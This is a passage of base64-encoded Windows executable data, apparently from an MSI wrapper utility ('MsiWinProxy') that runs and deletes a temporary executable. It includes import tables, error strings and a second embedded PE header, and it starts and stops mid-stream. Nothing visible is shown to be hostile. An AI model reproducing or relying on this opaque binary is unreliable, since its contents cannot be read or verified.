gAgACUAZAAuAAAARQByAHIAbwByACAAbQBvAHYAaQBuAGcAIABmAGkAbABlACAAcABvAGkAbgB0AGUAcgAgAHQAbwAgAG8AZgBmAHMAZQB0AC4AAAAAAEUAcgByAG8AcgAgAHIAZQBhAGQAaQBuAGcAIABpAG4AcAB1AHQAIABmAGkAbABlAC4AAABFAHIAcgBvAHIAIAB3AHIAaQB0AGkAbgBnACAAbwB1AHQAcAB1AHQAIABmAGkAbABlAC4AAAAAAAAAAAAiAAAAIgAgAAAAAABSAHUAbgAgACcAJQBzACcALgAAAAAAAABFAHIAcgBvAHIAIAByAHUAbgBuAGkAbgBnACAAJwAlAHMAJwAuACAARQByAHIAbwByACAAJQBsAGQAIAAoADAAeAAlAGwAeAApAC4AAAAAAEUAcgByAG8AcgAgAGcAZQB0AHQAaQBuAGcAIABlAHgAaQB0ACAAYwBvAGQAZQAuAAAAAAAAAAAARQByAHIAbwByACAAcgBlAG0AbwB2AGkAbgBnACAAdABlAG0AcAAgAGUAeABlAGMAdQB0AGEAYgBsAGUALgAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQQQQBw+UAAAwAAAFJTRFMD3l/qlMjRSIsXYtZtvtxpAQAAAEM6XHNzMlxQcm9qZWN0c1xNc2lXcmFwcGVyXE1zaVdpblByb3h5XFJlbGVhc2VcTXNpV2luUHJveHkucGRiAAAAAAAAAAAAAAA0AAAcNgAAMJMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAkBtAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAADyHEAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAPofQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAA+yFAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAADtIkAAAAAAAP7///8AAAAAiP///wAAAAD+////tSRAALkkQAD+////eyRAAI8kQAD+////AAAAAND///8AAAAA/v///wAAAACNM0AAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAACY4QAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAA4zlAAAAAAAAAAAAArzlAAP7///8AAAAA0P///wAAAAD+////AAAAAHJDQAAAAAAA/v///wAAAADQ////AAAAAP7///8AAAAAf0xAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAABLUEAAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAOJRQAAAAAAA/v///wAAAADI////AAAAAP7///8AAAAA9VRAAAAAAAD+////AAAAAIz///8AAAAA/v///6deQACrXkAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAEBhQAD+////AAAAAE9hQAD+////AAAAANj///8AAAAA/v///wAAAAACY0AA/v///wAAAAAOY0AA/v///wAAAADM////AAAAAP7///8AAAAACWdAAAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB+akAAAAAAAP7///8AAAAAzP///wAAAAD+////AAAAAExuQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAvHFAAAAAAAD+////AAAAAND///8AAAAA/v///wAAAAD6hUAAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAHaHQAAAAAAA/v///wAAAADM////AAAAAP7///8AAAAAa49AAAAAAAD+////AAAAAND///8AAAAA/v///36RQACVkUAAAAAAAP7///8AAAAA2P///wAAAAD+////25JAAO+SQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAV5ZAAAAAAAD+////AAAAAMj///8AAAAA/v///wAAAAAdmEAAAAAAAAAAAABZl0AA/v///wAAAADQ////AAAAAP7///8AAAAA/ZhAAAAAAAD+////AAAAANT///8AAAAA/v///wqaQAAmmkAAAAAAAP7///8AAAAA2P///wAAAAD+/////KdAAACoQAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAR6lAAAAAAAD+////AAAAAMD///8AAAAA/v///wAAAAA0q0AAAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAHy8QAAAAAAA/v///wAAAADU////AAAAAP7///8AAAAARr5AAAAAAAD+////AAAAAND///8AAAAA/v///wAAAACrv0AAAAAAAP7///8AAAAA0P///wAAAAD+////AAAAAI7JQAC4/gAAAAAAAAAAAADcAAEAAOAAAAgAAQAAAAAAAAAAAPgAAQBQ4QAA+P8AAAAAAAAAAAAAGgEBAEDhAAAAAAEAAAAAAAAAAAA4AQEASOEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAABACYAAQA4AAEASAABAFwAAQBsAAEAfgABAI4AAQCkAAEAugABAMgAAQDQAAEA+gUBAOwFAQBEAQEAUgEBAGQBAQB4AQEAjAEBAKgBAQDGAQEA2gEBAPIBAQAKAgEAFgIBACgCAQA+AgEASgIBAFYCAQBsAgEAfAIBAI4CAQCaAgEArgIBAMACAQDOAgEA3gIBAPQCAQAKAwEAJAMBAD4DAQBQAwEAXgMBAHADAQCIAwEAlgMBAKIDAQCwAwEAugMBANIDAQDoAwEAAAQBAA4EAQAcBAEANgQBAEYEAQBcBAEAdgQBAIIEAQCMBAEAmAQBAKoEAQC4BAEA4AQBAPAEAQAEBQEAFAUBACoFAQA6BQEARgUBAFYFAQBkBQEAdAUBAIQFAQCUBQEApgUBALgFAQDKBQEA2gUBAAAAAAAEAQEAAAAAACYBAQAAAAAA6gABAAAAAADqAUdldEZpbGVBdHRyaWJ1dGVzVwAAhwFHZXRDb21tYW5kTGluZVcAhQJHZXRUZW1wUGF0aFcAAIMCR2V0VGVtcEZpbGVOYW1lVwAAcwRTZXRMYXN0RXJyb3IAAKgAQ3JlYXRlUHJvY2Vzc1cAAAICR2V0TGFzdEVycm9yAAD5BFdhaXRGb3JTaW5nbGVPYmplY3QA3wFHZXRFeGl0Q29kZVByb2Nlc3MAAFIAQ2xvc2VIYW5kbGUAsgRTbGVlcABIA0xvY2FsRnJlZQBLRVJORUwzMi5kbGwAABUCTWVzc2FnZUJveFcAVVNFUjMyLmRsbAAABgBDb21tYW5kTGluZVRvQXJndlcAAFNIRUxMMzIuZGxsAEUAUGF0aEZpbGVFeGlzdHNXAFNITFdBUEkuZGxsANYARGVsZXRlRmlsZVcAYwJHZXRTdGFydHVwSW5mb1cAwARUZXJtaW5hdGVQcm9jZXNzAADAAUdldEN1cnJlbnRQcm9jZXNzANMEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAClBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAA0lzRGVidWdnZXJQcmVzZW50AO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AADkDTGVhdmVDcml0aWNhbFNlY3Rpb24AABgEUnRsVW53aW5kAGYEU2V0RmlsZVBvaW50ZXIAAGcDTXVsdGlCeXRlVG9XaWRlQ2hhcgDAA1JlYWRGaWxlAAAlBVdyaXRlRmlsZQARBVdpZGVDaGFyVG9NdWx0aUJ5dGUAmgFHZXRDb25zb2xlQ1AAAKwBR2V0Q29uc29sZU1vZGUAAM8CSGVhcEZyZWUAABgCR2V0TW9kdWxlSGFuZGxlVwAARQJHZXRQcm9jQWRkcmVzcwAAGQFFeGl0UHJvY2VzcwBkAkdldFN0ZEhhbmRsZQAAEwJHZXRNb2R1bGVGaWxlTmFtZUEAABQCR2V0TW9kdWxlRmlsZU5hbWVXAABhAUZyZWVFbnZpcm9ubWVudFN0cmluZ3NXANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbwRTZXRIYW5kbGVDb3VudAAA8wFHZXRGaWxlVHlwZQBiAkdldFN0YXJ0dXBJbmZvQQDRAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgDHBFRsc0dldFZhbHVlAMUEVGxzQWxsb2MAAMgEVGxzU2V0VmFsdWUAxgRUbHNGcmVlAO8CSW50ZXJsb2NrZWRJbmNyZW1lbnQAAMUBR2V0Q3VycmVudFRocmVhZElkAADrAkludGVybG9ja2VkRGVjcmVtZW50AADNAkhlYXBDcmVhdGUAAOwEVmlydHVhbEZyZWUApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgCTAkdldFRpY2tDb3VudAAAwQFHZXRDdXJyZW50UHJvY2Vzc0lkAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAcgFHZXRDUEluZm8AaAFHZXRBQ1AAADcCR2V0T0VNQ1AAAAoDSXNWYWxpZENvZGVQYWdlAI8AQ3JlYXRlRmlsZVcA4wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50AIcEU2V0U3RkSGFuZGxlAABXAUZsdXNoRmlsZUJ1ZmZlcnMAABoFV3JpdGVDb25zb2xlQQCwAUdldENvbnNvbGVPdXRwd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